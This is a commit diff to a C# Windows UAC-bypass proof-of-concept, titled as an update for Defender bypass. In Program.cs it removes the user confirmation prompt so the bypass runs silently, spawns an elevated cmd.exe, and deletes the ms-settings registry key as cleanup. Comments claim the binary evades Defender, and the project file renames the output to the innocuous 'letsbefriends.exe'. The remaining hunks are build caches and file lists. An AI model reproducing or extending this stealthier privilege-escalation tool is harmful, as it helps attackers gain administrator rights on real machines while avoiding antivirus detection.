Source code updated for defender bypass

UAC_Bypass_POC/Program.cs

@@ -4,7 +4,6 @@
 using System.Diagnostics;
 using System.Management;
 using System.Security.Principal;
-using System.Windows.Forms;
 #endregion
 
 namespace UAC_Bypass_POC
@@ -125,30 +124,18 @@ static void Main()
             {
                 if (!IsAdministrator())
                 {
-                    DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);
-
-                    if (result == DialogResult.Yes)
-                    {
-                        Bypass.UAC();
-                    }
-                    else if (result == DialogResult.Cancel)
-                    {
-                        Environment.Exit(0);
-                    }
-                    else if (result == DialogResult.No)
-                    {
-                        Environment.Exit(0);
-                    }
+                    Bypass.UAC();
 
                 }
                 else if (IsAdministrator()) 
                 {
-                    string command = "/c start cmd.exe "; //once elevated what to run.
-                    Process.Start("CMD.exe", command); 
+                    //this method seems to bypass defender
+                    //5-02-2021 and binary is not flagged
+                    string WhatToElevate = "cmd.exe"; // cmd.exe will be elevated as an example and PoC
+                    Process.Start("CMD.exe", "/c start " + WhatToElevate); 
                     RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
-                    uac_clean.DeleteSubKeyTree("shell");
+                    uac_clean.DeleteSubKeyTree("shell"); //deleting this is important because if we won't delete that right click of windows will break.
                     uac_clean.Close();
-                    System.Windows.Forms.MessageBox.Show("Process Elevated!");
                 }
 
             }catch { Environment.Exit(0); }

UAC_Bypass_POC/UAC_Bypass_POC.csproj

@@ -7,10 +7,11 @@
     <ProjectGuid>{FA30222D-992E-4925-99E2-E75FABAF2051}</ProjectGuid>
     <OutputType>WinExe</OutputType>
     <RootNamespace>UAC_Bypass_POC</RootNamespace>
-    <AssemblyName>UAC_Bypass_POC</AssemblyName>
-    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+    <AssemblyName>letsbefriends</AssemblyName>
+    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <Deterministic>true</Deterministic>
+    <TargetFrameworkProfile />
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
@@ -31,6 +32,9 @@
     <ErrorReport>prompt</ErrorReport>
     <WarningLevel>4</WarningLevel>
   </PropertyGroup>
+  <PropertyGroup>
+    <StartupObject>UAC_Bypass_POC.Program</StartupObject>
+  </PropertyGroup>
   <ItemGroup>
     <Reference Include="System" />
     <Reference Include="System.Core" />
@@ -55,7 +59,9 @@
     <Compile Include="Properties\Resources.Designer.cs">
       <AutoGen>True</AutoGen>
       <DependentUpon>Resources.resx</DependentUpon>
+      <DesignTime>True</DesignTime>
     </Compile>
+    <None Include="app.config" />
     <None Include="Properties\Settings.settings">
       <Generator>SettingsSingleFileGenerator</Generator>
       <LastGenOutput>Settings.Designer.cs</LastGenOutput>

UAC_Bypass_POC/app.config

@@ -0,0 +1,3 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+<startup><supportedRuntime version="v2.0.50727"/></startup></configuration>

UAC_Bypass_POC/obj/Debug/UAC_Bypass_POC.csproj.CoreCompileInputs.cache

@@ -1 +1 @@
-4a428c8718106036af93efc06f3cc8ede8939aef
+c3b81b54c02bed525b40bf7302b9eb115baea318

UAC_Bypass_POC/obj/Debug/UAC_Bypass_POC.csproj.FileListAbsolute.txt

@@ -6,3 +6,12 @@ C:\Users\dev\source\repos\UAC_Bypass_POC\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC
 C:\Users\dev\source\repos\UAC_Bypass_POC\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.csproj.CoreCompileInputs.cache
 C:\Users\dev\source\repos\UAC_Bypass_POC\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.exe
 C:\Users\dev\source\repos\UAC_Bypass_POC\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.pdb
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.csprojAssemblyReference.cache
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.Properties.Resources.resources
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.csproj.GenerateResource.cache
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\UAC_Bypass_POC.csproj.CoreCompileInputs.cache
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Debug\letsbefriends.exe.config
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Debug\letsbefriends.exe
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Debug\letsbefriends.pdb
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\letsbefriends.exe
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Debug\letsbefriends.pdb

UAC_Bypass_POC/obj/Release/UAC_Bypass_POC.csproj.CoreCompileInputs.cache

@@ -0,0 +1 @@
+8a5066119e30328f113c99b8564bf0e33b3e4f43

UAC_Bypass_POC/obj/Release/UAC_Bypass_POC.csproj.FileListAbsolute.txt

@@ -0,0 +1,8 @@
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Release\letsbefriends.exe.config
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Release\letsbefriends.exe
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\bin\Release\letsbefriends.pdb
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Release\UAC_Bypass_POC.Properties.Resources.resources
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Release\UAC_Bypass_POC.csproj.GenerateResource.cache
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Release\UAC_Bypass_POC.csproj.CoreCompileInputs.cache
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Release\letsbefriends.exe
+C:\Users\dev\Downloads\UAC_Exploit-main\UAC_Exploit-main\UAC_Bypass_POC\obj\Release\letsbefriends.pdb